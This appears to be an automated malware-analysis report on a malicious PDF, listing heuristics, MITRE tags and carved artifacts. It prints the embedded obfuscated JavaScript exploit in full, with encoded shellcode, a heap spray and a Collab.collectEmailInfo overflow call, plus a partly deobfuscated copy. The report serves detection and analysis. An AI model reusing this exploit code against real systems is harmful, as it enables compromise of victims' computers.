MALICIOUS
178
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1204.002 Malicious File
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The EXTRACTED_FILE_STATIC_TRIAGE heuristic flags this JavaScript as suspicious due to hex escape obfuscation and high-entropy content. This suggests the script is designed to download and execute a secondary payload, a common technique for malware delivery. No specific family could be identified.
Machine Learning
- Nyx PDF Classifier malicious score 0.9980
Heuristics 8
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Obfuscated multi-stage PDF JavaScript heap-spray exploit critical PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAYPDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERYBounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded file low PDF_EMBEDDEDPDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
-
Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTALThe same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
k1 |
pdf-embedded-file | PDF EmbeddedFile object 26 at offset 0x1EC1 | 1206312 bytes |
SHA-256: d5005e6ee2e649716afeda73fc5624d60ddac2ec2e3497a03f11116991a6a4e7 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 8.00, consistent with packed or encrypted content.
|
|||
javascript_obj0031_000.js |
pdf-javascript-stream | PDF /JS object 31 at offset 0x12B202 | 13124 bytes |
SHA-256: b4bf3c327495a1779930487dbfa9ecc600cd335bd59fb3705d5de3f6543bdc25 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s). Carved artifact contains 1 long hex-escaped blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var ahfdhfeiuiofifafjkafahfhdlfadafh=unescape;
var QazWSxeDCrFVtGBUjnIkmOIuplM = ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x75\x39\x30\x39\x30\x25\x75\x39\x30\x39\x30\x25\x75\x39\x30\x39\x30\x25\x75\x65\x62\x39\x30\x25\x755\x6518\x25\x755\x6256\x25\x75068\x61\x25\x75303\x63\x25\x751474\x25\x756\x6266\x25\x7549\x630"+
"\x25\x758\x6146\x25\x75\x33226\x25\x7588\x634\x25\x75430\x33\x25\x75\x65\x6246\x25\x75\x658\x65\x62\x25\x75\x66\x66\x653\x25\x75\x66\x66\x66\x66"+
"\x25\x754445\x25\x755843\x25\x756544\x25\x756444\x25\x756444\x25\x754d43\x25\x755744\x25\x754941\x25\x755a4e\x25\x755942\x25\x755a4a\x25\x755444"+
"\x25\x755942\x25\x755a4a\x25\x756844\x25\x755942\x25\x756b43\x25\x757844\x25\x75584d\x25\x755942\x25\x755a4a\x25\x756c44\x25\x754543\x25\x754a41"+
"\x25\x75584d\x25\x754b43\x25\x754943\x25\x756141\x25\x756944\x25\x756444\x25\x756444\x25\x756444\x25\x755849\x25\x756344\x25\x755142\x25\x754d41"+
"\x25\x756c44\x25\x755142\x25\x754e41\x25\x75674b\x25\x75584b\x25\x757841\x25\x756e43\x25\x756541\x25\x754a41\x25\x757a4a\x25\x755942\x25\x757743"+
"\x25\x75474b\x25\x75474b\x25\x755942\x25\x757a47\x25\x755844\x25\x755942\x25\x754f43\x25\x754c44\x25\x756343\x25\x756744\x25\x757845\x25\x755942"+
"\x25\x755143\x25\x757a52\x25\x755942\x25\x754143\x25\x754444\x25\x756744\x25\x755441\x25\x756a41\x25\x755044\x25\x755243\x25\x755942\x25\x755044"+
"\x25\x755942\x25\x756744\x25\x755845\x25\x755744\x25\x757641\x25\x755744\x25\x754941\x25\x757541\x25\x755a46\x25\x755642\x25\x754941\x25\x756f43"+
"\x25\x756344\x25\x754841\x25\x754641\x25\x756944\x25\x756744\x25\x757141\x25\x756241\x25\x755945\x25\x75584b\x25\x756743\x25\x75474b\x25\x754c44"+
"\x25\x756e43\x25\x756841\x25\x755942\x25\x754143\x25\x75474b\x25\x756744\x25\x755441\x25\x755947\x25\x755942\x25\x756844\x25\x755043\x25\x755942"+
"\x25\x754143\x25\x757844\x25\x756744\x25\x755441\x25\x755942\x25\x75674b\x25\x755942\x25\x756744\x25\x754c41\x25\x755849\x25\x757a4e\x25\x75474b"+
"\x25\x757844\x25\x757a43\x25\x754a41\x25\x754e41\x25\x757a47\x25\x755a4e\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x757143\x25\x756444"+
"\x25\x75784d\x25\x757a47\x25\x754743\x25\x754b43\x25\x757343\x25\x756444\x25\x75674b\x25\x756444\x25\x756444\x25\x757641\x25\x756e43\x25\x755844"+
"\x25\x757641\x25\x756e43\x25\x755343\x25\x757641\x25\x754e43\x25\x757a52\x25\x755744\x25\x756445\x25\x755947\x25\x755942\x25\x755643\x25\x754743"+
"\x25\x755942\x25\x756643\x25\x755844\x25\x755942\x25\x755a45\x25\x756142\x25\x754445\x25\x754446\x25\x754e41\x25\x755a46\x25\x755644\x25\x754a41"+
"\x25\x755644\x25\x754b41\x25\x757842\x25\x757741\x25\x754241\x25\x757741\x25\x754341\x25\x756b41\x25\x755945\x25\x757143\x25\x756444\x25\x75784d"+
"\x25\x757a47\x25\x757a4a\x25\x754b43\x25\x757641\x25\x756e43\x25\x754743\x25\x755942\x25\x754e43\x25\x755844\x25\x754943\x25\x757641\x25\x756e43"+
"\x25\x755743\x25\x757641\x25\x754e43\x25\x757844\x25\x755942\x25\x754e43\x25\x757a4a\x25\x754d44\x25\x754e43\x25\x754343\x25\x755142\x25\x756643"+
"\x25\x754343\x25\x756444\x25\x756443\x25\x754446\x25\x757641\x25\x756e43\x25\x755743\x25\x757641\x25\x754e43\x25\x756c44\x25\x754a41\x25\x757846"+
"\x25\x755543\x25\x756a44\x25\x756541\x25\x755142\x25\x756b42\x25\x756742\x25\x756343\x25\x757241\x25\x754542\x25\x757441\x25\x756b44\x25\x755744"+
"\x25\x754341\x25\x755842\x25\x756447\x25\x755443\x25\x756744\x25\x754e41\x25\x756d42\x25\x757742\x25\x757344\x25\x756444\x25\x756743\x25\x757244"+
"\x25\x755a47\x25\x757341\x25\x757444\x25\x75416e\x25\x756243\x25\x756e44\x25\x756141\x25\x755a46\x25\x756c44\x25\x755341\x25\x756d43\x25\x75584d"+
"\x25\x754942\x25\x756643\x25\x755641\x25\x754a42\x25\x757741\x25\x755842\x25\x756a44\x25\x756541\x25\x754542\x25\x756744\x25\x756844\x25\x756444"+
"\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444"+
"\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444"+
"\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756942"+
"\x25\x756942\x25\x756942\x25\x756942\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444"+
"\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756f43\x25\x755a47\x25\x757643\x25\x756b43\x25\x754a44"+
"\x25\x755a47\x25\x756343\x25\x755a47\x25\x756444\x25\x756141\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x754643\x25\x755342\x25\x756441"+
"\x25\x756d43\x25\x756444\x25\x756444\x25\x756444\x25\x756141\x25\x755a46\x25\x757741\x25\x757641\x25\x757641\x25\x755942\x25\x755941\x25\x755942"+
"\x25\x755845\x25\x755942\x25\x757741\x25\x755942\x25\x754741\x25\x755142\x25\x754841\x25\x755444\x25\x756141\x25\x755946\x25\x757741\x25\x757641"+
"\x25\x757641\x25\x755744\x25\x756445\x25\x755849\x25\x755643\x25\x755343\x25\x755142\x25\x757a47\x25\x755343\x25\x75674b\x25\x755744\x25\x756445"+
"\x25\x754a43\x25\x757641\x25\x756e43\x25\x755343\x25\x757641\x25\x754e43\x25\x75474b\x25\x755944\x25\x755242\x25\x756842\x25\x757644\x25\x756444"+
"\x25\x756943\x25\x756541\x25\x755944\x25\x755242\x25\x756942\x25\x757644\x25\x756444\x25\x756c43\x25\x756c41\x25\x757343\x25\x757641\x25\x756444"+
"\x25\x756444\x25\x756444\x25\x757143\x25\x755a4a\x25\x757641\x25\x754e43\x25\x754844\x25\x755849\x25\x757a47\x25\x755a52\x25\x754b43\x25\x757343"+
"\x25\x757641\x25\x756444\x25\x756444\x25\x756444\x25\x757641\x25\x754e43\x25\x756844\x25\x755942\x25\x754141\x25\x755942\x25\x757a47\x25\x755a52"+
"\x25\x756744\x25\x754841\x25\x755142\x25\x756141\x25\x756144\x25\x754f41\x25\x756444\x25\x756444\x25\x757641\x25\x756e43\x25\x755a52\x25\x757641"+
"\x25\x754e43\x25\x757444\x25\x757143\x25\x756444\x25\x757143\x25\x756444\x25\x757343\x25\x756444\x25\x75416e\x25\x756444\x25\x756444\x25\x757641"+
"\x25\x756e43\x25\x755343\x25\x757641\x25\x754e43\x25\x754444\x25\x757143\x25\x756444\x25\x75784d\x25\x757a47\x25\x754743\x25\x754b43\x25\x757143"+
"\x25\x75674b\x25\x75784d\x25\x757a47\x25\x754f43\x25\x754b43\x25\x757641\x25\x756e43\x25\x755343\x25\x757641\x25\x754e43\x25\x757a52\x25\x757143"+
"\x25\x756444\x25\x757143\x25\x756444\x25\x757343\x25\x757444\x25\x75416e\x25\x756444\x25\x756444\x25\x757641\x25\x756e43\x25\x755343\x25\x757641"+
"\x25\x754e43\x25\x754444\x25\x754e43\x25\x757143\x25\x756444\x25\x757343\x25\x755242\x25\x756444\x25\x756444\x25\x756444\x25\x757143\x25\x756644"+
"\x25\x757143\x25\x756444\x25\x757143\x25\x756544\x25\x757343\x25\x756444\x25\x756444\x25\x756444\x25\x755a4a\x25\x75784d\x25\x757a47\x25\x757343"+
"\x25\x754b43\x25\x755142\x25\x757a47\x25\x757044\x25\x756144\x25\x756241\x25\x756e44\x25\x755942\x25\x755845\x25\x755942\x25\x757641\x25\x754e43"+
"\x25\x755942\x25\x756541\x25\x757641\x25\x755947\x25\x757044\x25\x756141\x25\x757841\x25\x757641\x25\x757641\x25\x757641\x25\x754643\x25\x755142"+
"\x25\x757141\x25\x757641\x25\x756e43\x25\x756644\x25\x756241\x25\x755a4b\x25\x755849\x25\x757a47\x25\x755743\x25\x757343\x25\x756444\x25\x75674b"+
"\x25\x756444\x25\x756444\x25\x757143\x25\x755a4a\x25\x757641\x25\x754e43\x25\x754844\x25\x755849\x25\x757a47\x25\x755844\x25\x755942\x25\x757a47"+
"\x25\x754f43\x25\x755849\x25\x757a47\x25\x754343\x25\x756141\x25\x755143\x25\x757741\x25\x757641\x25\x757641\x25\x754e43\x25\x755744\x25\x756445"+
"\x25\x754a43\x25\x75784d\x25\x757a47\x25\x757343\x25\x754b43\x25\x755142\x25\x757a47\x25\x754c44\x25\x756144\x25\x756241\x25\x756e44\x25\x755942"+
"\x25\x755845\x25\x754242\x25\x754242\x25\x754e43\x25\x755942\x25\x756541\x25\x757641\x25\x755947\x25\x754c44\x25\x756141\x25\x757841\x25\x757641"+
"\x25\x757641\x25\x757641\x25\x754643\x25\x757143\x25\x756444\x25\x757143\x25\x757641\x25\x757641\x25\x754e43\x25\x75674b\x25\x754242\x25\x754242"+
"\x25\x754242\x25\x754e43\x25\x755942\x25\x756541\x25\x755142\x25\x754d41\x25\x755945\x25\x757143\x25\x755845\x25\x756141\x25\x757946\x25\x756444"+
"\x25\x756444\x25\x756444\x25\x755849\x25\x757a47\x25\x757541\x25\x757641\x25\x756e43\x25\x756c44\x25\x756141\x25\x755743\x25\x756444\x25\x756444"+
"\x25\x756444\x25\x755849\x25\x757a47\x25\x755945\x25\x757143\x25\x756444\x25\x75784d\x25\x757a47\x25\x757141\x25\x754b43\x25\x757641\x25\x756e43"+
"\x25\x755945\x25\x757641\x25\x756e43\x25\x756c44\x25\x757641\x25\x756e43\x25\x757541\x25\x756141\x25\x756843\x25\x756444\x25\x756444\x25\x756444"+
"\x25\x755942\x25\x757a47\x25\x757141\x25\x756445\x25\x754b41\x25\x75674b\x25\x756444\x25\x754541\x25\x754541\x25\x754e43\x25\x755942\x25\x756541"+
"\x25\x755142\x25\x754d41\x25\x757141\x25\x757143\x25\x755845\x25\x756141\x25\x754c43\x25\x756444\x25\x756444\x25\x756444\x25\x755849\x25\x757a47"+
"\x25\x757541\x25\x755942\x25\x755643\x25\x756c44\x25\x755942\x25\x757a47\x25\x756844\x25\x754841\x25\x756941\x25\x757444\x25\x755947\x25\x755942"+
"\x25\x754841\x25\x754b43\x25\x757641\x25\x756e43\x25\x757541\x25\x756141\x25\x755043\x25\x756444\x25\x756444\x25\x756444\x25\x756445\x25\x754b41"+
"\x25\x756c44\x25\x756444\x25\x754541\x25\x754541\x25\x754541\x25\x754e43\x25\x755942\x25\x756541\x25\x754843\x25\x755942\x25\x757a47\x25\x756c44"+
"\x25\x75784d\x25\x754b43\x25\x756744\x25\x755942\x25\x757a52\x25\x755142\x25\x754941\x25\x75674b\x25\x75784d\x25\x755942\x25\x757641\x25\x757741"+
"\x25\x757741\x25\x757741\x25\x755a45\x25\x755a41\x25\x754744\x25\x754241\x25\x755342\x25\x756841\x25\x755242\x25\x755242\x25\x755242\x25\x755242"+
"\x25\x756f43\x25\x754445\x25\x755a45\x25\x754841\x25\x755242\x25\x755242\x25\x756444\x25\x756444\x25\x756e43\x25\x756244\x25\x754841\x25\x754445"+
"\x25\x757444\x25\x755142\x25\x754941\x25\x756644\x25\x755941\x25\x756841\x25\x75784b\x25\x754b41\x25\x756447\x25\x756445\x25\x754b41\x25\x75674b"+
"\x25\x756444\x25\x757641\x25\x754144\x25\x75674b\x25\x754444\x25\x755a4a\x25\x756444\x25\x757641\x25\x754144\x25\x756c44\x25\x754444\x25\x755a4a"+
"\x25\x756444\x25\x757641\x25\x754144\x25\x756444\x25\x754444\x25\x755a4a\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444"+
"\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444"+
"\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444"+
"\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444\x25\x756444"+
"\x25\x753030");
var o ="";
for (asdfafjiaehruiuifjkfnznashdkalfnhdsfj=128;asdfafjiaehruiuifjkfnznashdkalfnhdsfj>=0;--asdfafjiaehruiuifjkfnznashdkalfnhdsfj) o += ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x754943\x25\x759f93");
JpeKAFDjrTfdKIERlblJLAmY = o + QazWSxeDCrFVtGBUjnIkmOIuplM;
fhwpbcVvadNUtmvSVbaNLbnkoRXYJU = ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x754943\x25\x759f93");
NGwa = 20;
MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV = NGwa+JpeKAFDjrTfdKIERlblJLAmY.length
while (fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length<MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV) fhwpbcVvadNUtmvSVbaNLbnkoRXYJU+=fhwpbcVvadNUtmvSVbaNLbnkoRXYJU;
sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQasdfafjiaehruiuifjkfnznashdkalfnhdsfjKYl = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU["substring"](0, MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV);
sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU["substring"](0, fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length-MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV);
while(sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi.length+MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV < 0x40000) sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQasdfafjiaehruiuifjkfnznashdkalfnhdsfjKYl;
var dakslfjaljfklasfjasdlk = Array;
afsdfasfcxzfcsdagfdgfgfasdfafacadf = new dakslfjaljfklasfjasdlk();
for(afdadfcznzmzhczjncafahfjkasdhfjkdfh=0;afdadfcznzmzhczjncafahfjkasdhfjkdfh<300;afdadfcznzmzhczjncafahfjkasdhfjkdfh++) afsdfasfcxzfcsdagfdgfgfasdfafacadf[afdadfcznzmzhczjncafahfjkasdhfjkdfh] = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi + JpeKAFDjrTfdKIERlblJLAmY;
var iJCYnMqYfdUqJybccHmtjpgocdxIgC = ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x75\x30c\x30c\x25\x750c0c");
while(iJCYnMqYfdUqJybccHmtjpgocdxIgC.length < 0x1200) iJCYnMqYfdUqJybccHmtjpgocdxIgC =iJCYnMqYfdUqJybccHmtjpgocdxIgC+iJCYnMqYfdUqJybccHmtjpgocdxIgC;
var adfafasdffsfsdfdfvcvv = Collab;
var dfzfddfgfgasfasddcacs = this;
dfzfddfgfgasfasddcacs.collabStore = adfafasdffsfsdfdfvcvv["collectmailInfo"]({subj: "",msg: iJCYnMqYfdUqJybccHmtjpgocdxIgC});
|
|||
generic_stage_recovery_000.js |
deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 31 at offset 0x12B202 | 7664 bytes |
SHA-256: 1b2a07898f77324d3b79e6ffc3fe410cb48c595030879d8f14b2c380c1b2aba6 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
12 of 24 identifiers look randomly generated (e.g. 'MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKooui') — consistent with name-mangling obfuscation. Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var ahfdhfeiuiofifafjkafahfhdlfadafh=unescape;
var QazWSxeDCrFVtGBUjnIkmOIuplM = ahfdhfeiuiofifafjkafahfhdlfadafh("%u9090%u9090%u9090%ueb90%u5e18%u5b56%u068a%u303c%u1474%u6b66%u49c0%u8a46%u3226%u88c4%u4303%ueb46%ue8eb%uffe3%uffff%u4445%u5843%u6544%u6444%u6444%u4d43%u5744%u4941%u5a4e%u5942%u5a4a%u5444%u5942%u5a4a%u6844%u5942%u6b43%u7844%u584d%u5942%u5a4a%u6c44%u4543%u4a41%u584d%u4b43%u4943%u6141%u6944%u6444%u6444%u6444%u5849%u6344%u5142%u4d41%u6c44%u5142%u4e41%u674b%u584b%u7841%u6e43%u6541%u4a41%u7a4a%u5942%u7743%u474b%u474b%u5942%u7a47%u5844%u5942%u4f43%u4c44%u6343%u6744%u7845%u5942%u5143%u7a52%u5942%u4143%u4444%u6744%u5441%u6a41%u5044%u5243%u5942%u5044%u5942%u6744%u5845%u5744%u7641%u5744%u4941%u7541%u5a46%u5642%u4941%u6f43%u6344%u4841%u4641%u6944%u6744%u7141%u6241%u5945%u584b%u6743%u474b%u4c44%u6e43%u6841%u5942%u4143%u474b%u6744%u5441%u5947%u5942%u6844%u5043%u5942%u4143%u7844%u6744%u5441%u5942%u674b%u5942%u6744%u4c41%u5849%u7a4e%u474b%u7844%u7a43%u4a41%u4e41%u7a47%u5a4e%u6444%u6444%u6444%u6444%u7143%u6444%u784d%u7a47%u4743%u4b43%u7343%u6444%u674b%u6444%u6444%u7641%u6e43%u5844%u7641%u6e43%u5343%u7641%u4e43%u7a52%u5744%u6445%u5947%u5942%u5643%u4743%u5942%u6643%u5844%u5942%u5a45%u6142%u4445%u4446%u4e41%u5a46%u5644%u4a41"+
"%u5644%u4b41%u7842%u7741%u4241%u7741%u4341%u6b41%u5945%u7143%u6444%u784d%u7a47%u7a4a%u4b43%u7641%u6e43%u4743%u5942%u4e43%u5844%u4943%u7641%u6e43%u5743%u7641%u4e43%u7844%u5942%u4e43%u7a4a%u4d44%u4e43%u4343%u5142%u6643%u4343%u6444%u6443%u4446%u7641%u6e43%u5743%u7641%u4e43%u6c44%u4a41%u7846%u5543%u6a44%u6541%u5142%u6b42%u6742%u6343%u7241%u4542%u7441%u6b44%u5744%u4341%u5842%u6447%u5443%u6744%u4e41%u6d42%u7742%u7344%u6444%u6743%u7244%u5a47%u7341%u7444%u416e%u6243%u6e44%u6141%u5a46%u6c44%u5341%u6d43%u584d%u4942%u6643%u5641%u4a42%u7741%u5842%u6a44%u6541%u4542%u6744%u6844%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6942%u6942%u6942%u6942%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6f43%u5a47%u7643%u6b43%u4a44%u5a47%u6343%u5a47%u6444%u6141%u6444%u6444%u6444%u6444%u4643%u5342%u6441%u6d43%u6444%u6444%u6444%u6141%u5a46%u7741%u7641%u7641%u5942%u5941%u5942%u5845%u5942%u7741%u5942%u4741%u5142%u4841%u5444%u6141%u5946%u7741%u7641"+
"%u7641%u5744%u6445%u5849%u5643%u5343%u5142%u7a47%u5343%u674b%u5744%u6445%u4a43%u7641%u6e43%u5343%u7641%u4e43%u474b%u5944%u5242%u6842%u7644%u6444%u6943%u6541%u5944%u5242%u6942%u7644%u6444%u6c43%u6c41%u7343%u7641%u6444%u6444%u6444%u7143%u5a4a%u7641%u4e43%u4844%u5849%u7a47%u5a52%u4b43%u7343%u7641%u6444%u6444%u6444%u7641%u4e43%u6844%u5942%u4141%u5942%u7a47%u5a52%u6744%u4841%u5142%u6141%u6144%u4f41%u6444%u6444%u7641%u6e43%u5a52%u7641%u4e43%u7444%u7143%u6444%u7143%u6444%u7343%u6444%u416e%u6444%u6444%u7641%u6e43%u5343%u7641%u4e43%u4444%u7143%u6444%u784d%u7a47%u4743%u4b43%u7143%u674b%u784d%u7a47%u4f43%u4b43%u7641%u6e43%u5343%u7641%u4e43%u7a52%u7143%u6444%u7143%u6444%u7343%u7444%u416e%u6444%u6444%u7641%u6e43%u5343%u7641%u4e43%u4444%u4e43%u7143%u6444%u7343%u5242%u6444%u6444%u6444%u7143%u6644%u7143%u6444%u7143%u6544%u7343%u6444%u6444%u6444%u5a4a%u784d%u7a47%u7343%u4b43%u5142%u7a47%u7044%u6144%u6241%u6e44%u5942%u5845%u5942%u7641%u4e43%u5942%u6541%u7641%u5947%u7044%u6141%u7841%u7641%u7641%u7641%u4643%u5142%u7141%u7641%u6e43%u6644%u6241%u5a4b%u5849%u7a47%u5743%u7343%u6444%u674b%u6444%u6444%u7143%u5a4a%u7641%u4e43%u4844%u5849%u7a47%u5844%u5942%u7a47"+
"%u4f43%u5849%u7a47%u4343%u6141%u5143%u7741%u7641%u7641%u4e43%u5744%u6445%u4a43%u784d%u7a47%u7343%u4b43%u5142%u7a47%u4c44%u6144%u6241%u6e44%u5942%u5845%u4242%u4242%u4e43%u5942%u6541%u7641%u5947%u4c44%u6141%u7841%u7641%u7641%u7641%u4643%u7143%u6444%u7143%u7641%u7641%u4e43%u674b%u4242%u4242%u4242%u4e43%u5942%u6541%u5142%u4d41%u5945%u7143%u5845%u6141%u7946%u6444%u6444%u6444%u5849%u7a47%u7541%u7641%u6e43%u6c44%u6141%u5743%u6444%u6444%u6444%u5849%u7a47%u5945%u7143%u6444%u784d%u7a47%u7141%u4b43%u7641%u6e43%u5945%u7641%u6e43%u6c44%u7641%u6e43%u7541%u6141%u6843%u6444%u6444%u6444%u5942%u7a47%u7141%u6445%u4b41%u674b%u6444%u4541%u4541%u4e43%u5942%u6541%u5142%u4d41%u7141%u7143%u5845%u6141%u4c43%u6444%u6444%u6444%u5849%u7a47%u7541%u5942%u5643%u6c44%u5942%u7a47%u6844%u4841%u6941%u7444%u5947%u5942%u4841%u4b43%u7641%u6e43%u7541%u6141%u5043%u6444%u6444%u6444%u6445%u4b41%u6c44%u6444%u4541%u4541%u4541%u4e43%u5942%u6541%u4843%u5942%u7a47%u6c44%u784d%u4b43%u6744%u5942%u7a52%u5142%u4941%u674b%u784d%u5942%u7641%u7741%u7741%u7741%u5a45%u5a41%u4744%u4241%u5342%u6841%u5242%u5242%u5242%u5242%u6f43%u4445%u5a45%u4841%u5242%u5242%u6444%u6444%u6e43%u6244%u4841%u4445"+
"%u7444%u5142%u4941%u6644%u5941%u6841%u784b%u4b41%u6447%u6445%u4b41%u674b%u6444%u7641%u4144%u674b%u4444%u5a4a%u6444%u7641%u4144%u6c44%u4444%u5a4a%u6444%u7641%u4144%u6444%u4444%u5a4a%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u3030");
var o ="";
for (asdfafjiaehruiuifjkfnznashdkalfnhdsfj=128;asdfafjiaehruiuifjkfnznashdkalfnhdsfj>=0;--asdfafjiaehruiuifjkfnznashdkalfnhdsfj) o += ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x754943\x25\x759f93");
JpeKAFDjrTfdKIERlblJLAmY = o + QazWSxeDCrFVtGBUjnIkmOIuplM;
fhwpbcVvadNUtmvSVbaNLbnkoRXYJU = ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x754943\x25\x759f93");
NGwa = 20;
MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV = NGwa+JpeKAFDjrTfdKIERlblJLAmY.length
while (fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length<MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV) fhwpbcVvadNUtmvSVbaNLbnkoRXYJU+=fhwpbcVvadNUtmvSVbaNLbnkoRXYJU;
